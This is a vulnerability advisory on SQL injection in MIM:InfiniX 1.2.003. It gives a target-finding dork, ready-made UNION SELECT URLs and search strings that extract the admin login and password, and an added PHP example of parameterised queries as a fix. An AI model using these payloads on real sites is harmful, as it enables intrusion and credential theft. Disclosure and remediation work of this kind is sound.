
MULTIPLE REMOTE SQL INJECTION VULNERABILITIES---MIM:InfiniX v1.2.003--->






--------------------------------------------------------------------------
MULTIPLE REMOTE SQL INJECTION VULNERABILITIES --MIM:InfiniX v1.2.003-->
--------------------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://mim.infinix.it
-->DOWNLOAD: https://sourceforge.net/projects/infinix/
-->DEMO: http://mim.infinix.it
-->CATEGORY: CMS / Portal
-->DESCRIPTION: MIM:InfiniX Manuale Intermediale della Modernita': Infinite Info...
		in Xml PHP-XHTML-XML-XSL-CSS-AJAX-RDF. Design your CMS and store...
-->RELEASED: 2009-04-21

CMS VULNERABILITY:

-->TESTED ON: Firefox 3
-->DORK: "Developed by rbk"
-->CATEGORY: MULTIPLE SQL INJECTION VULNERABILITIES
-->AFFECTED VERSION: 1.2.003 (maybe <= ?)
-->Discovered Bug date: 2009-04-27
-->Reported Bug date: 2009-04-27
-->Fixed bug date: 2009-04-28
-->Info patch: v1.2.003
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support.
-->EXTRA-COMMENT: Thanks to everyone for putting up with me! (I love you, little one!)


#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>>


-------
INTRO:
-------

The admin chooses whether or not to use a database.

This CMS is completely vulnerable to SQL Injection (I only show some vars).


------------------
PROOF OF CONCEPT:
------------------


For example ("month" and "year" GET vars). Links:


http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5&year=2009%27+AND+0+UNION+ALL+SELECT+1,version(),database(),4,5,6/*

http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5%27+AND+0+UNION+ALL+SELECT+1,version(),database(),4,5,6/*&year=2009


Another example (search post form). Search this:


anything%')) union all select 1,database(),version(),user(),5,6,7,8,9,database(),11#


----------
EXPLOITS:
----------


We get the admin credentials:


http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5&year=2009%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6 FROM admin WHERE id=1/*

http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6+FROM+admin+WHERE+id=1/*&year=2009


anything%')) union all select 1,database(),database(),concat(user,'--::--',pass),5,6,7,8,9,database(),11 FROM admin WHERE id=1#


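One way the "month", "year" and search inputs above can be handled without depending on magic_quotes_gpc (which PHP removed in 5.4), as an added example that is not MIM:InfiniX code. The events and posts tables, their columns and every function name are hypothetical, and the demo data is constructed; it assumes the pdo_sqlite extension so it runs offline.

```php
<?php
// Added example, not MIM:InfiniX source. The events/posts tables, their
// columns and all function names are hypothetical; data is constructed.
declare(strict_types=1);

// Accept only an integer in the expected range; input such as
// "2009' AND 0 UNION ALL SELECT ..." is rejected before any SQL is built.
function int_param(array $src, string $key, int $min, int $max): ?int
{
    $v = filter_var($src[$key] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $v === false ? null : $v;
}

function calendar_events(PDO $db, array $get): ?array
{
    $month = int_param($get, 'month', 1, 12);
    $year  = int_param($get, 'year', 1970, 2100);
    if ($month === null || $year === null) {
        return null;                      // caller answers HTTP 400
    }
    // Values are bound as integers, never concatenated into the statement.
    $st = $db->prepare('SELECT title FROM events WHERE m = :m AND y = :y');
    $st->bindValue(':m', $month, PDO::PARAM_INT);
    $st->bindValue(':y', $year, PDO::PARAM_INT);
    $st->execute();
    return $st->fetchAll(PDO::FETCH_COLUMN);
}

function search_posts(PDO $db, string $term): array
{
    // Escape LIKE wildcards with '!' so the term matches literally, then bind.
    $like = '%' . preg_replace('/[!%_]/', '!$0', $term) . '%';
    $st = $db->prepare("SELECT title FROM posts WHERE title LIKE :t ESCAPE '!'");
    $st->execute([':t' => $like]);
    return $st->fetchAll(PDO::FETCH_COLUMN);
}

// Offline demo on in-memory SQLite with constructed rows.
$db = new PDO('sqlite::memory:', null, null,
    [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec("CREATE TABLE events (m INT, y INT, title TEXT);
           CREATE TABLE posts (title TEXT);
           INSERT INTO events VALUES (5, 2009, 'Release party');
           INSERT INTO posts VALUES ('Hello world'), ('100% done')");
var_dump(calendar_events($db, ['month' => '5', 'year' => '2009']));
var_dump(calendar_events($db, ['month' => '5', 'year' => "2009' AND 0 UNION ALL SELECT 1"]));
var_dump(search_posts($db, "anything%')) union all select 1#"));
var_dump(search_posts($db, '0%'));
```

The valid calendar request returns the one matching row, the tampered "year" value is rejected with null before any query runs, and the search strings are matched only as literal text. With a MySQL PDO driver, also set PDO::ATTR_EMULATE_PREPARES to false so statements are prepared by the server.
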
#######################################################################
#######################################################################
##*******************************************************************##
##               ESPECIAL GREETZ TO: Str0ke, JosS, ...               ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################
